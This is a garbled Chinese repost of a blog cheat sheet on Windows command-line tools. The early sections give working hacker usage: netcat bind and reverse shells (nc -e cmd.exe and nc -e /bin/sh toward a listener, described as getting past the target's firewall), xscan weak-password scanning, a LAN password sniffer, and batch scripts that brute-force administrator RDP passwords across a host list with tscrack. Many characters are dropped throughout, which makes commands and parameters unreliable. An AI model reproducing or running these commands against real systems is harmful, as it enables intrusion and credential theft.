cmd 命令

原文:http://wangdetian168.iteye.com/blog/388782

(二)系统外部命令(均需下载相关工具):
1、瑞士军刀:nc.exe
参数说明:
-h查看帮助信息
-d后台模式
-erog程序重定向,一但连接就执行〔危险〕
-iecs延时的间隔
-l监听模式,用于入站连接
-L监听模式,连接天闭后仍然继续监听,直到CTR C
-IP地址,不能用域名
-ofilm记录16进制的传输
-p[空格]端口本地端口号
-r随机本地及远程端口
-t使用Telnet交互方式
-uUDP模式
-v详细输出,用-vv将更详细
-w数字timeout延时间隔
-z将输入,输出关掉(用于扫锚时)
基本用法:
nc-nvv192.168.0.180连接到192.168.0.1主机的80端口
nc-l-80开启本机的TC80端口并监听
nc-nvv-w2-z192.168.0.180-1024扫锚192.168.0.1的80-1024端口
nc-l-5354-t-ec:witsystem32cmd.exe绑定remote主机的cmdshell在remote的TC5354端口
nc-t-ec:witsystem32cmd.exe192.168.0.25354梆定remote主机的cmdshell并反向连接192.168.0.2的5354端口
高级用法:
nc-L-80作为蜜罐用1:开启并不停地监听80端口,直到CTR C为止
nc-L-80gtc:\log.txt作为蜜罐用2:开启并不停地监听80端口,直到CTR C,同时把结果输出到c:\log.txt
nc-L-80ltc:\honeyport.txt作为蜜罐用3-1:开启并不停地监听80端口,直到CTR C,并把c:\honeyport.txt中内容送入管道中,亦可起到传送文件作用
type.exec:\honeyport|c-L-80作为蜜罐用3-2:开启并不停地监听80端口,直到CTR C,并把c:\honeyport.txt中内容送入管道中,亦可起到传送文件作用
本机上用:nc-l-本机端口
在对方主机上用:nc-ecmd.exe本机I-本机端口*win2K
nc-e/bin/sh本机I-本机端口*linux,unix反向连接突破对方主机的防火墙
本机上用:nc-d-l-本机端口lt要传送的文件路径及名称
在对方主机上用:nc-vv本机I本机端口gt存放文件的路径及名称传送文件到对方主机
备注:
|管道命令
<或gt重定向命令。“<”,例如:tlntadmlttest.txt指把test.txt的内容赋值给tlntadmn命令
@表示执行@后面的命令,但不会显示出来(后台执行);例:@dirc:\witgtgtd:\log.txt意思是:后台执行dir,并把结果存在d:\log.txt中
>与>gt;的区别 ">"指:覆盖;">gt;"指:保存到(添加到)。
如:@dirc:\witgtgtd:\log.txt和@dirc:\witgtd:\log.txt二个命令分别执行二次比较看:用>gt;的则是把二次的结果都保存了,而用:>则只有一次的结果,是因为第二次的结果把第一次的覆盖了。
2、扫锚工具:xscan.exe
基本格式
xsca-hostlt;起始Igt;[-<终止Igt;]lt;检测项目>[其他选项]扫锚"起始IP到终止IP"段的所有主机信息
xsca-filelt;主机列表文件名>lt;检测项目>[其他选项]扫锚"主机IP列表文件名"中的所有主机信息
检测项目
-active检测主机是否存活
-o检测远程操作系统类型(通过NETBIOS和MP协议)
-port检测常用服务的端口状态
-ft检测FTP弱口令
-pu检测FTP服务匿名用户写权限
-pop3检测POP3-Server弱口令
-smt检测SMTP-Server漏洞
-sql检测SQL-Server弱口令
-sm检测NT-Server弱口令
-ii检测IIS编码/解码漏洞
-cgi检测CGI漏洞
-nasl加载Neus攻击脚本
-all检测以上所有项目
其它选项
-i适配器编号设置网络适配器,lt;适配器编号>可通过"-l"参数获取
-l显示所有网络适配器
-v显示详细扫描进度
-跳过没有响应的主机
-o跳过没有检测到开放端口的主机
 -t并发线程数量,并发主机数量指定最大并发线程数量和并发主机数量,默认数量为100,10
-log文件名指定扫描报告文件名(后缀为:TXT或HTML格式的文件)
用法示例
xsca-host192.168.1.1-192.168.255.255-all-active-p 检测192.168.1.1-192.168.255.255网段内主机的所有漏洞,跳过无响应的主机
xsca-host192.168.1.1-192.168.255.255-port-sm-t150-o检测192.168.1.1-192.168.255.255网段内主机的标准端口状态,NT弱口令用户,最大并发线程数量为150,跳过没有检测到开放端口的主机
xsca-filehostlist.txt-port-cgi-t200,5-v-o检测“hostlist.txt”文件中列出的所有主机的标准端口状态,CGI漏洞,最大并发线程数量为200,同一时刻最多检测5台主机,显示详细检测进度,跳过没有检测到开放端口的主机
命令行方式嗅探器:xiff.exe
可捕获局域网内FTP/SMTP/POP3/HTTP协议密码
参数说明
-tc输出TCP数据报
-ud输出UDP数据报
-icm输出ICMP数据报
-pa过滤密码信息
-hide后台运行
-host解析主机名
-addrIP地址过滤IP地址
-port端口过滤端口
-log文件名将输出保存到文件
-asc以ASCII形式输出
-hex以16进制形式输出
用法示例
xiff.exe-pa-hide-loga.log后台运行嗅探密码并将密码信息保存在pa.log文件中
xiff.exe-tc-ud-asc-addr192.168.1.1嗅探192.168.1.1并过滤tcp和udp信息并以ASCII格式输出
4、终端服务密码破解:tscrack.exe
参数说明
-h显示使用帮助
-v显示版本信息
-在屏幕上打出解密能力
-密码错误时发出的声音
-t同是发出多个连接(多线程)
-reventystemLogentrieotargetederver
-U卸载移除tscrack组件
-f使用-f后面的密码
-F间隔时间(频率)
-l使用-l后面的用户名
-w使用-w后面的密码字典
-使用-p后面的密码
-D登录主页面
用法示例
tscrack192.168.0.1-l***istrator-wa.dic远程用密码字典文件暴破主机的***istrator的登陆密码
tscrack192.168.0.1-l***istrator-123456用密码123456远程登陆192.168.0.1的***istrator用户
@ifotexistipcscan.txtgotoosca
@for/f"toke=1delims="ii(3389.txt)docallhack.bati
ca
@echo3389.txtofindorcafaild
(①存为3389.bat)(假设现有用SuperScan或其它扫锚器扫到一批开有3389的主机IP列表文件3389.txt)
3389.bat意思是:从3389.txt文件中取一个IP,接着运行hack.bat
@ifotexisttscrack.exegotoosca
@tscrack1-l***istrator-wa.dicgtgt;rouji.txt
:nosca
@echotscrack.exeofindorcafaild
(②存为hack.bat)(运行3389.bat就OK,且3389.bat、hack.bat、3389.txt、pa.dic与tscrack.exe在同一个目录下;就可以等待结果了)
hack.bat意思是:运行tscrack.exe用字典暴破3389.txt中所有主机的***istrator密码,并将破解结果保存在rouji.txt文件中。
5、其它:
Shutdown.exe
Shutdow\\IP地址t:2020秒后将对方NT自动关闭(Window2003系统自带工具,在Windows2000下用进就得下载此工具才能用。在前面Window2003DOS命令中有详细介绍。)
fpipe.exe(TCP端口重定向工具)在第二篇中有详细说明(端口重定向绕过防火墙)
fpipe-l80-1029-r80www.sina.com.cn当有人扫锚你的80端口时,他扫到的结果会完全是www.sina.com.cn的主机信息
Fpipe-l23-88-r23目标I把本机向目标IP发送的23端口Telnet请求经端口重定向后,就通过88端口发送到目标IP的23端口。(与目标IP建立Telnet时本机就用的88端口与其相连接)然后:直接Telnet127.0.0.1(本机IP)就连接到目标IP的23端口了。
OpenTelnet.exe(远程开启telnet工具)
opentelnet.exe\\IP帐号 密码 ntlm认证方式 Telnet端口(不需要上传ntlm.exe破坏微软的身份验证方式)直接远程开启对方的telnet服务后,就可用telnet\\ip连接上对方。
NTLM认证方式:0:不使用NTLM身份验证;1:先尝试NTLM身份验证,如果失败,再使用用户名和密码;2:只使用NTLM身份验证。
ResumeTelnet.exe(OpenTelnet附带的另一个工具)
resumetelnet.exe\\IP 帐号 密码用Telnet连接完对方后,就用这个命令将对方的Telnet设置还原,并同时关闭Telnet服务。
#10十:
6、FTP命令详解:
FTP命令是Internet用户使用最频繁的命令之一,熟悉并灵活应用FTP的内部命令,可以大大方便使用者,并收到事半功倍之效。如果你想学习使用进行后台FTP下载,那么就必须学习FTP指令。
FTP的命令行格式为:
ft-v-d-i--g[主机名],其中
-v显示远程服务器的所有响应信息;
-限制ftp的自动登录,即不使用;.etrc文件;
-d使用调试方式;
-g取消全局文件名。
FTP使用的内部命令如下(中括号表示可选项):
1.![cmd[args]]:在本地机中执行交互shell,exit回到ftp环境,如:!ls*.zi
2.$macro-ame[args]:执行宏定义macro-name。
3.account[paword]:提供登录远程系统成功后访问系统资源所需的补充口令。
4.aendlocal-file[remote-file]:将本地文件追加到远程系统主机,若未指定远程系统文件名,则使用本地文件名。
5.ascii:使用ascii类型传输方式。
6.bell:每个命令执行完毕后计算机响铃一次。
7.bin:使用二进制文件传输方式。
8.bye:退出ftp会话过程。
9.case:在使用mget时,将远程主机文件名中的大写转为小写字母。
10.cdremote-dir:进入远程主机目录。
11.cdup:进入远程主机目录的父目录。
12.chmodmodefile-name:将远程主机文件file-name的存取方式设置为mode,如:chmod777a.out。
13.close:中断与远程服务器的ftp会话(与open对应)。
14.cr:使用acii方式传输文件时,将回车换行转换为回行。
15.deleteremote-file:删除远程主机文件。
16.debug[debug-value]:设置调试方式,显示发送至远程主机的每条命令,如:deu3,若设为0,表示取消debug。
17.dir[remote-dir][local-file]:显示远程主机目录,并将结果存入本地文件。
18.discoection:同close。
19.formformat:将文件传输方式设置为format,缺省为file方式。
20.getremote-file[local-file]:将远程主机的文件remote-file传至本地硬盘的local-file。
21.glob:设置mdelete,mget,mput的文件名扩展,缺省时不扩展文件名,同命令行的-g参数。
22.hash:每传输1024字节,显示一个hash符号(#)。
23.help[cmd]:显示ftp内部命令cmd的帮助信息,如:helget。
24.idle[seconds]:将远程服务器的休眠计时器设为[seconds]秒。
25.image:设置二进制传输方式(同binary)。
26.lcd[dir]:将本地工作目录切换至dir。
27.ls[remote-dir][local-file]:显示远程目录remote-dir,并存入本地文件local-file。
28.macdefmacro-name:定义一个宏,遇到macdef下的空行时,宏定义结束。
29.mdelete[remote-file]:删除远程主机文件。
30.mdirremote-filelocal-file:与dir类似,但可指定多个远程文件,如:mdir*.o.*.zipoutfile。
31.mgetremote-files:传输多个远程文件。
32.mkdirdir-name:在远程主机中建一目录。
33.mlremote-filelocal-file:同nlist,但可指定多个文件名。
34.mode[modename]:将文件传输方式设置为modename,缺省为stream方式。
35.modtimefile-name:显示远程主机文件的最后修改时间。
36.mputlocal-file:将多个文件传输至远程主机。
37.newerfile-name:如果远程机中file-name的修改时间比本地硬盘同名文件的时间更近,则重传该文件。
38.nlist[remote-dir][local-file]:显示远程主机目录的文件清单,并存入本地硬盘的local-file。
39.nmap[iatteroutpattern]:设置文件名映射机制,使得文件传输时,文件中的某些字符相互转换,如:nma$1.$2.$3[$1,$2].[$2,$3],则传输文件a1.a2.a3时,文件名变为a1,a2。该命令特别适用于远程主机为非UNIX机的情况。

40.ntra[inchars[outchars]]:设置文件名字符的翻译机制,如ntra1R,则文件名LLL将变为RRR。
41.opehost[port]:建立指定ftp服务器连接,可指定连接端口。
42.paive:进入被动传输方式。
43.prompt:设置多个文件传输时的交互提示。
44.proxyftp-cmd:在次要控制连接中,执行一条ftp命令,该命令允许连接两个ftp服务器,以在两个服务器间传输文件。第一条ftp命令必须为open,以首先建立两个服务器间的连接。
45.putlocal-file[remote-file]:将本地文件local-file传送至远程主机。
46.pwd:显示远程主机的当前工作目录。
47.quit:同bye,退出ftp会话。
48.quotearg1,arg2...:将参数逐字发至远程ftp服务器,如:quoteyst.
49.recvremote-file[local-file]:同get。
50.regetremote-file[local-file]:类似于get,但若local-file存在,则从上次传输中断处续传。
51.rhelp[cmd-name]:请求获得远程主机的帮助。
52.rstatus[file-name]:若未指定文件名,则显示远程主机的状态,否则显示文件状态。
53.rename[from][to]:更改远程主机文件名。
54.reset:清除回答队列。
55.restartmarker:从指定的标志marker处,重新开始get或put,如:restart130。
56.rmdirdir-name:删除远程主机目录。
57.runique:设置文件名只一性存储,若文件存在,则在原文件后加后缀.1,.2等。
58.sendlocal-file[remote-file]:同put。
59.sendport:设置PORT命令的使用。
60.sitearg1,arg2...:将参数作为SITE命令逐字发送至远程ftp主机。
61.sizefile-name:显示远程主机文件大小,如:siteidle7200。
62.status:显示当前ftp状态。
63.struct[struct-name]:将文件传输结构设置为struct-name,缺省时使用stream结构。
64.sunique:将远程主机文件名存储设置为只一(与runique对应)。
65.system:显示远程主机的操作系统类型。
66.tenex:将文件传输类型设置为TENEX机的所需的类型。
67.tick:设置传输时的字节计数器。
68.trace:设置包跟踪。
69.type[type-name]:设置文件传输类型为type-name,缺省为ascii,如:typeinary,设置二进制传输方式。
70.umask[newmask]:将远程服务器的缺省umask设置为newmask,如:umask3
71.useruser-name[paword][account]:向远程主机表明自己的身份,需要口令时,必须输入口令,如:useranonymoumy@email。
72.verbose:同命令行的-v参数,即设置详尽报告方式,ft服务器的所有响应都将显示给用户,缺省为on.
73.?[cmd]:同help.
7:计算机运行命令全集winver---------检查Windows版本
wmimgmt.msc----打开windows管理体系结构
wupdmgr--------windows更新程序
winver---------检查Windows版本
wmimgmt.msc----打开windows管理体系结构
wupdmgr--------windows更新程序
wscript--------windows脚本宿主设置
write----------写字板winmsd-----系统信息
wiaacmgr-------扫描仪和照相机向导
winchat--------XP自带局域网聊天
mem.exe--------显示内存使用情况
Msconfig.exe---系统配置实用程序
mplayer2-------简易widnowmedialayer
maint--------画图板
mstsc----------远程桌面连接
mplayer2-------媒体播放机
magnify--------放大镜实用程序
mmc------------打开控制台
moync--------同步命令
dxdiag---------检查DirectX信息
drwt32------系统医生
devmgmt.msc---设备管理器
dfrg.msc-------磁盘碎片整理程序
diskmgmt.msc---磁盘管理实用程序
dcomcnfg-------打开系统组件服务
ddeshare-------打开DDE共享设置
dvdplay--------DVD播放器
nettomeenger-----停止信使服务
nettartmeenger----开始信使服务
notepad--------打开记事本
lookup-------网络管理的工具向导
ntbackup-------系统备份和还原
narrator-------屏幕"讲述人"
ntmsmgr.msc----移动存储管理器
ntmsoprq.msc---移动存储管理员操作请求
netstat-an----(TC)命令检查接口
synca--------创建一个公文包
sysedit--------系统配置编辑器
sigverif-------文件签名验证程序
drec32-------录音机
shrpubw--------创建共享文件夹
secpol.msc-----本地安全策略
syskey---------系统加密,一旦加密就不能解开,保护windowxp系统的双重密码
services.msc---本地服务设置
dvol32-------音量控制程序
sfc.exe--------系统文件检查器
sfc/scaow---windows文件保护
thutdn-------60秒倒计时关机命令
tourstart------xp简介(安装完成后出现的漫游xp程序)
taskmgr--------任务管理器
eventvwr-------事件查看器
eudcedit-------造字程序
explorer-------打开资源管理器
packager-------对象包装程序
perfmon.msc----计算机性能监测程序
progman--------程序管理器
regedit.exe----注册表
rsop.msc-------组策略结果集
regedt32-------注册表编辑器
rononce-----15秒关机
regsvr32/u*.dll----停止dll文件运行
regsvr32/uzipfldr.dll------取消ZIP支持
cmd.exe--------CMD命令提示符
chkdsk.exe-----Chkdsk磁盘检查
certmgr.msc----证书管理实用程序
calc-----------启动计算器
charmap--------启动字符映射表
cliconfg-------SQLERVER客户端网络实用程序
Clird--------剪贴板查看器
conf-----------启动netmeeting
compmgmt.msc---计算机管理
cleanmgr-------**整理
ciadv.msc------索引服务程序
osk------------打开屏幕键盘
odbcad32-------ODBC数据源管理器
oobe/msoobe/a----检查XP是否激活
lusrmgr.msc----本机用户和组
logoff---------注销命令
iexpre-------木马捆绑工具,系统自带
lookup-------IP地址侦测器
fsmgmt.msc-----共享文件夹管理器
utilman--------辅助工具管理器
gpedit.msc-----组策略

你可能感兴趣的:(windows,应用服务器,配置管理,项目管理,XP)